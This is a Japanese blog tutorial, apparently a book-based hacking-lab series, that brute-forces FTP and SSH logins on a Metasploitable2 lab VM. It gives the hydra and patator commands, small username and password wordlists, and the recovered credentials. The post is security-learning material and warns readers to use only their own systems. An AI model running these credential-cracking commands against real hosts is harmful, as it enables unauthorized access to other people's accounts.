LoginSignup
0
3

More than 1 year has passed since last update.

Kali Linux2022.1 でハッキングラボをつくってみる 7 Metasploitable2をハッキングする3 hydraによるオンラインパスワードクラッキング

Last updated at Posted at 2022-05-05

はじめに

前回からの続きです。
オンラインでパスワードを解析できるhydraを使って、ftpとsshのアカウントを解析していきます。「ハッキング・ラボのつくりかた」(IPUSIRON著)のp.380-384をもとにした記事となります。

注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。

準備

ftpのアカウントを辞書攻撃(事前に流出したアカウントやパスワードのリストを入手しておいて、それをもとにアクセスを繰り返してアカウントをハッキングする)する。
肝心の辞書は、同書のp.381の内容に従います。また、それとの比較でrockyou.txtも利用する。

user.lst
root
sys
msfadmin
user
service
postgres
tomcat
pass.lst
user
password
12345678
msfadmin
root
guest
batman
asdfasdf
tomcat

pass.lstの最後は、空行で終える。空行ということは、つまり「パスワードが設定されていない」ということ。

rockyou.txtはgithubなどで入手できる、KaliLinuxのデファイル"/usr/share/wordlists/rockyou.txt.gz"があるので、それを解凍して利用してもよい。
解凍するときは、失敗したとしても良いように-kオプションでもとの書庫ファイルを維持するようにした。

sudo gunzip -k /usr/share/wordlists/rockyou.txt.gz

ちなみに、rockyou.txtは2021年バージョンもあり、それは12GB以上もある!
[参考URL]
https://github.com/ohmybahgosh/RockYou2021.txt

ftpのアカウントをハッキング

辞書攻撃式パスワードクラッキングのコマンドを実行する。並列処理タスクはデフォルトの16のままにしておいた。timeコマンドをつけて、どれくらい時間がかかるのか、わかりやすいようにしてある。

time hydra -L user.lst -P pass.lst 192.168.56.5 ftp

VirtualBox_kali-linux-2022.1-hydra1.png

次は、同書の記述どおりに、-tオプションで並列処理タスクを8に指定してから実行する。

time hydra -L user.lst -P pass.lst -t 8 192.168.56.5 ftp

VirtualBox_kali-linux-2022.1-hydra2.png
並行処理タスクを8に指定したほうが、やや時間がかかっているが、CPU負担は少ない。と言っても、CPU使用率はほとんど変わらない。

rockyou.txtをユーザーリストファイル、パスワードファイルに指定してみる。

time hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.56.5 ftp

実行してみると、非常に時間がかかるので現実的ではない。
単に辞書が大きければ良いというものではなく、洗練されたものが必要であることがわかった。

sshのアカウントをハッキング

sshのアカウントを辞書攻撃する。sshに対してパスワードクラッキングをするときは、並列処理タスクが多いと警告がでるので、-tオプションで並列処理タスクを4つに指定する。

hydra -L user.lst -P pass.lst -t 4 192.168.56.5 ssh
//または
hydra -L user.lst -P pass.lst -t 4 ssh://192.168.56.5:22

後者のコマンドは、末尾が「サービス名://サーバーのIPアドレス:ポート番号」の書式となっている。プロトコルのデフォルトのポート番号が変更されている場合、後者の書式で対応する。

ハッキングが成功した
VirtualBox_kali-linux-2022.1-hydra4ssh.png

hydraでのハッキングが失敗した場合

同書では、hydraでのsshアカウントのパスワードクラッキングが失敗した場合に、代わりとして、patatorというツールの利用が紹介されている。

 patator ssh_login host=192.168.56.5 user=FILE0 password=FILE1 0=user.lst 1=pass.lst -x ignore:mesg='Authentication failed.'

少し変わった構文・・・(個人的感想)
だが、hydraと同じようにハッキングに成功した。
VirtualBox_kali-linux-2022.1-patator1.png

おわりに

アカウント情報をまとめると

ユーザー名 ftpのパスワード sshのパスワード
msfadmin msfadmin msfadmin
user user user
sys なし batman

ftpには2つのアカウント、sshには3つのアカウントがあることがわかった。
そのうち、2つのアカウントは、ユーザー名とパスワードが同一というぜいじゃくなパスワードを使用している。

0
3
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
3